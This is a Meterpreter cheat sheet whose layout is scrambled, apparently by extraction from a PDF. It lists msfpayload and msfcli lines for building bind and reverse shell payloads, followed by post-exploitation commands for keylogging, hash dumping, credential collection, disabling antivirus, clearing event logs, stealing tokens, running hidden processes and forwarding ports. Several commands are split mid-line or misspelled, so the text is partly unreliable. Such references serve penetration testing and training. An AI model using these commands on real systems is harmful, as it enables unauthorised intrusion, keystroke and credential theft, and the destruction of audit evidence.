Meterpreter Cheat Sheet
version: 0.1
Executing Meterpreter
As a Metasploit Exploit Payload (bind_tcp) for bind shell or (reverse_tcp) for reverse shell As Standalone binary to be uploaded and executed on the target system:
User Interface Commands
meterpreter> idletime
Displays how much time the user is inactive
meterpreter> keyscan_start ./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > meterpreter.exe (Bind Shell) ./msfcli exploit/multi/handler PAYLOAD=windows/meterpeter/bind_tcp LPORT=443 RHOST=<IP> ./msfpayload wndows/meterpreter/reverse_tcp RHOST=<IP> RPORT=443 X > meterpreter.exe (Reverse Shell) ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=443 E Starts recording user key typing meterpreter>keyscan_dump
Dumps the users key strokes
meterpreter> keyscan_stop
Stops recording user typing
Core Commands
meterpreter> background
Puts the Meterpreter session in background mode. Session could be recovered typing:
sessions l ( to identify session ID) espia Allows Desktop spying through screenshots Allows user impersonation sort of commands Allows filesystem and hash dumping commands Allows network sniffing interaction commands sessions i <Session ID>
meterpreter> use <library>
Permits loading extra meterpreter functionalities with the following loadable libraries:
meterpreter> run <script>
Permits the execution of ruby selfdeveloped meterpreter scripts such:
checkvm credcollect get_local_subnets getcountermeasure getgui gettelnet hashdump keylogrecorder killav metsvc migrate netenum prefetchtool vnc_oneport / vnc sheduleme winenum
meterpreter> irb
Opens meterpreter scripting menu
incognito
priv
sniffer
�File System Commands
meterpreter> getwd
Obtain current working directory on Servers Side
System Commands
meterpreter> sysinfo Provides information about target host meterpreter> getuid Obtain the username responsible for the current process meterpreter> kill <pid> meterpreter> edit <file> Edit the given file Kill the given process identified by PID meterpreter> ps meterpreter> execute f file [Options]
Execute the given file on the OS target host. Options:
meterpreter> getlwd
Obtain local current working directory
-H Create the process hidden from view
-a -i Arguments to pass to the command Interact with the process after creating it
meterpreter> del <file>
Deletes the given file
meterpreter> cat <file> Read the given file
-m Execute from memmory -t Execute process with currently impersonated thread token
meterpreter> clearav
Clears and secure removes event logs
meterpreter> upload <src file> <dst file> Upload a file to the target host
List all running processes
meterpreter> shell Obtain interactive windows OS Shell
meterpreter> steal_token
Attemps to steal an impersonation token from the target process
meterpreter> download <src file> <dst file>
Download a file from the target host
Networking Commands
meterpreter> portfwd Establish port forwarding meterpreter tunnels: Options: -L -l -p -r Local host to listen on Local port to listen on Remote port to connect to Remote host to connect to connections through
meterpreter> reg <Command> [Options]
Interact with the target OS Windows Registry using the following options and commands: commands:
Options:
-d Data to store in the registry value -k The registry key -v The registry value name
enumkey
Enumerate the supplied registry key
createkey / deletekey Create/deleted the supplied registry key setval / queryval Set/query values from the supplied registry key
meterpreter> ipconfig
Displays network interfaces information
meterpreter> route View and modify networking routing table
